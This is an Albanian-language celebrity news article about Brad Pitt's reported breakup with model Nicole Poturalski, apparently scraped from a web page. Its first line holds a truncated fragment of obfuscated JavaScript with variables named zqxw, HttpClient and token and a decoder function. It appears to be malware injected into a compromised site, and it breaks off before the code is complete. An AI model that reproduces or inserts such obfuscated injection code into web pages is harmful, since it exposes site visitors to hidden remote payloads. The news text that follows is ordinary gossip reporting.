;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Brad Pitt ndahet nga e dashura 30 vjet më e re

By

Lidhja e tyre bëri menjëherë bujë në mediat e huaja. Është fjala për romancën e shumëpërfolur të aktorit të famshëm të “Hollywood”-it, Brad Pitt me modelen gjermane, Nicole Poturalski. Por tani duket se gjërat mes tyre kanë marrë fund.

Duke cituar burime pranë Brad dhe Nicole, “Page Six” ka shkruar se dyshja i ka dhënë fund lidhjes të shumë komentuar. Burimet kanë shtuar se dy personazhet e njohur të ekranit nuk kanë pasur një lidhje shumë serioze dhe se ndarja e tyre ka ndodhur pak kohë më parë.

Kujtojmë se lidhja e tyre u bë publike në muajin gusht të këtij viti, kur 56-vjeçari u kap mat me 27-vjeçaren në vilën e tij në Francë. Këtë shtëpi, aktori e ndan me ish-bashkëshorten, Angelina Jolie.

Gjithashtu mediat e huaja shkruanin se Brad Pitt u njoh fillimisht me modelen bukuroshe në restorantin e bashkëshortit të saj, Roland Mary, në Berlin. Po sipas mediave të huaja, aktori i famshëm u njoh me 68-vjeçarin në vitin 2009 kur po xhironte për filmin Quentin Tarantino, “Inglorious Basterds”

Brad Pitt u kthye në këtë restorant pas 10-vitesh, në 2019-n. Në atë kohë po promovonte filmin e tij të fundit Tarantino, Once Upon A Time in Hollywood, me Leonardo Di Caprio dhe Margot Robbie.

E pikërisht aty takoi edhe Nicole Poturalski, për të cilën fansat shprehen se ajo ka një ngjashmëri të madhe me aktoren e famshme të “Hollywood”-it, Angelina Jolie. Edhe pse ishte e lidhur me Brad, Nicole vijon që të jetë e martuar me 68-vjeçarin Roland, me të cilin ka një djalë 7-vjeçar, Emil. /KOHA/

Artikuj të ngjashëm